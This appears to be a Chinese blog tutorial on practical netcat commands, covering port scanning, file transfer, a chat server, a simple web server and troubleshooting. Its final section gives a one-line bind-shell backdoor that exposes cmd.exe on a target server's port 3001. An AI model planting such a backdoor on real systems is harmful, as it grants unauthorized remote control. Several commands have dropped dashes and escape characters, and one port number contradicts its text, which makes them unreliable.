<返回更多

8个nc命令的实用案例

2020-09-18    
加入收藏

1. 前言

本文主要列举8个Netcat nc命令的实用案例。

netcat(简称nc)是一个简单但功能强大的网络命令行工具,用于执行linux中与TCP、UDP或Unix套接字相关的任何操作。

netcat可用于端口扫描,端口重定向,启动端口监听器;它还可以用来打开远程连接和许多其他事情。此外,您可以使用它作为后门访问目标服务器。

在本文中,我们将通过使用案例解释netcat使用命令。

8个nc命令的实用案例

8个nc命令的实用案例

8个nc命令的实用案例

2. 如何在Linux中安装和使用netcat

要在系统上安装netcat包,请使用Linux发行版的默认包管理器。

基于centos或RHEL体系安装nc命令

yum install nc
8个nc命令的实用案例

基于CentOS或RHEL体系安装nc命令

基于CentOS或RHEL体系安装nc命令

基于Fedora 22+ 或 RHEL 8安装nc命令

dnf install nc

基于Debian或Ubuntu安装nc命令

sudo apt-get install netcat
8个nc命令的实用案例

基于Debian或Ubuntu安装nc命令

一旦安装了netcat包,您可以在下面的示例中进一步学习netcat命令的用法。

3. 使用nc命令扫描端口

netcat可用于端口扫描:了解目标服务器上哪些端口是打开的并正在运行服务。它可以扫描一个或多个或一系列打开的端口。

8个nc命令的实用案例

使用nc命令扫描端口

下面是一个示例,-z选项将nc设置为只扫描侦听守护进程,而不实际向它们发送任何数据。-v选项启用详细模式,而-w指定无法建立连接的超时。

扫描单个端口:

nc -v -w 2 z 192.168.56.1 22

扫描多个端口:

nc -v -w 2 z 192.168.56.1 22 80

扫描端口范围:

nc -v -w 2 z 192.168.56.1 20-25

4. 在Linux服务器之间传输文件

netcat允许您在两台Linux服务器之间传输文件,这两个系统都必须安装nc。

8个nc命令的实用案例

使用nc命令传输文件

例如,要将ISO映像文件从一台计算机复制到另一台计算机并监视传输过程(使用pv实用程序),请在发送者(存在ISO文件的地方)上运行以下命令。

先安装pv命令,比如在CentOS系统上执行以下命令安装pv程序:

yum -y install pv

这将在端口3000上以监听模式(-l选项)运行nc,在服务器上运行以下命令:

服务器的IP地址为192.168.192.134

tar -zcf - zcwyou.rar  | pv | nc -l -p 3000

在接收端/客户端计算机上,运行以下命令来获取文件。

nc 192.168.192.134 3000 | pv | tar -zxf -

5. 创建一个命令行聊天服务器

您还可以使用netcat立即创建一个简单的命令行消息传递服务器。与前面的使用示例一样,必须在聊天室使用的两个系统上安装nc。

在一个系统上,运行以下命令创建在端口5000上侦听的聊天服务器。

nc -l -vv -p 5000
8个nc命令的实用案例

创建一个命令行聊天服务器

在另一个系统上,运行以下命令,在运行消息传递服务器的机器上启动聊天会话。

nc 192.168.192.134 5000
8个nc命令的实用案例

命令行聊天客户端

6. 创建一个基本的Web服务器

使用nc命令的-l选项创建基本的、不安全的web服务器。为了演示这一点,创建如下所示的html文件。

vim index.html

在文件中添加以下HTML行:

<html>
        <head>
                <title>Test Page</title>
        </head>
        <body>
                      <p>Serving this file using Netcat Basic HTTP server!</p>
        </body>
</html>

保存文件中的更改并退出。

8个nc命令的实用案例

使用nc命令创建一个简单的Web服务器

然后通过运行以下命令提供服务提供HTTP服务,这将使HTTP服务器能够连续运行。

while : ; do ( echo -ne "HTTP/1.1 200 OKrn" ; cat index.html; ) | nc -l -p 8080 ; done
8个nc命令的实用案例

使用nc命令提供HTTP服务

然后打开web浏览器,可以使用以下地址访问内容:

http://192.168.1.1:8080

使用真实的服务地址替换192.168.1.1

注意,您可以通过按[Ctrl+ C]来停止Netcat HTTP服务器。

7. 解决Linux服务器连接问题

netcat的另一个实用功能是解决服务器连接问题。在这里,您可以使用netcat来验证服务器发送什么数据来响应客户机发出的命令。

使用下面的命令查看example.com的主页:

printf "GET / HTTP/1.0rnrn" | nc text.example.com 80

上述命令的输出包括web服务器发送的头部,可用于故障排除目的。

8. 查找在端口上运行的服务

您还可以使用netcat获得端口详细信息。在这种情况下,它将告诉您在某个端口后运行的是什么服务。例如,要了解特定服务器上端口22后面运行的是什么类型的服务,可以运行以下命令(使用目标服务器的IP地址替换192.168.56.110)。选项-n意味着禁用DNS解析。

nc -v -n 192.168.56.110 80

9. 创建一个流套接字

netcat还支持创建unix流套接字。下面的命令将创建并侦听一个unix流套接字。

nc -lU /var/tmp/mysocket &

检查:

ss -lpn | grep "/var/tmp/"

10. 创建一个后门

你也可以把netcat当成一个后门。然而,这需要更多的工作。如果netcat安装在目标服务器上,您可以使用它来创建后门,以获得远程命令提示符。

要启用一个后门,你需要netcat监听一个选择的端口(比如:端口3001),然后您可以按照如下方式从您的计算机连接到这个端口。

在远程服务器上运行以下命令,其中-d选项禁止从stdin读取,而-e选项指定要在目标系统上运行的命令。

nc -L -p 3001 -d -e cmd.exe 

11. 总结

在本教程中,我们演示了8个实用的nc命令实用案例。如果你有更好用法,请留言分享。

本文已同步至博客站,尊重原创,转载时请在正文中附带以下链接:https://www.linuxrumen.com/cyml/1800.html

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍最近更新
更多资讯 >>>